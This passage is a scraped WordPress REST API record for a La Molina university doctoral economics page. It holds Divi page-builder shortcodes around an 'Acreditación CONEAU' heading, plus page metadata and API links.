_module_preset=\u00bbdefault\u00bb custom_padding=\u00bb0px||66px|||\u00bb][et_pb_row _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb91%\u00bb max_width=\u00bb100%\u00bb custom_margin=\u00bb|auto|-21px|auto||\u00bb custom_padding=\u00bb|44px||44px|false|true\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_text _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bbRaleway|700|||||||\u00bb text_text_color=\u00bb#0C5E37&#8243; text_font_size=\u00bb20px\u00bb] Acreditaci\u00f3n CONEAU [\/et_pb_text][et_pb_text _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"<!-- wp:divi\/placeholder \/-->","_et_gb_content_width":"","footnotes":""},"class_list":["post-598","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/pages\/598","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/comments?post=598"}],"version-history":[{"count":4,"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/pages\/598\/revisions"}],"predecessor-version":[{"id":607,"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/pages\/598\/revisions\/607"}],"wp:attachment":[{"href":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-json\/wp\/v2\/media?parent=598"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}